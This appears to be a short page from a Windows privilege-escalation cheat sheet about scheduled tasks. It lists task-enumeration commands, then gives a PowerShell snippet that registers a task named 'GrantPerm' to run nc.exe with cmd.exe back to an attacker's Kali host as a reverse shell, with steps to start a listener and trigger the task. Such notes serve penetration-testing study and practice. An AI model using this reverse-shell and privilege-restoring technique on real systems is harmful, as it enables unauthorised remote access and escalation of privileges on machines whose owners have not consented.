Scheduled Tasks

  • List tasks current user can see

schtasks /query /fo LIST /v
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State

  • Look for logs or scripts that say this is running

Restoring Privs for NETWORK SERVICE or LOCAL SERVICE

  • Create a scheduled task that will get a reverse shell with privileges restored

$TaskAction = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-Exec Bypass -Command `"C:\wamp\www\nc.exe $KALI_IP $PORT -e cmd.exe`""
Register-ScheduledTask -Action $TaskAction -TaskName "GrantPerm"

  • Start nc listener then start the task

Start-ScheduledTask -TaskName "GrantPerm"
PreviousPassword HuntingNextInsecure File Permissions

Last updated